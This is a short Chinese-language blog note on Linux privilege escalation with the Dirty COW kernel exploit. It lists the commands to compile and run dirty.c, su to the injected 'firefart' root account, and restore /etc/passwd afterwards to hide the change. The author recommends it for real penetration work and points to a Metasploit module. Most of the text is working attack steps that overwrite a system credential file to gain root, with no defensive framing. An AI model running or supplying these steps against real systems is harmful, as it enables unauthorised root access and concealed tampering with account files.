Linux 溢出提权小记
1
2
3
4
5
6
7
8'脏牛'[Dirty copy-on-write] 提权小记:
实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本 Dirty COW.c 2.6.22 < 3.9
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty admin
$ su firefart
# mv /tmp/passwd.bak /etc/passwd 干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试
# exit
小结:
另外还有一些比较经典的linux提权exp,后期有空会慢慢推上来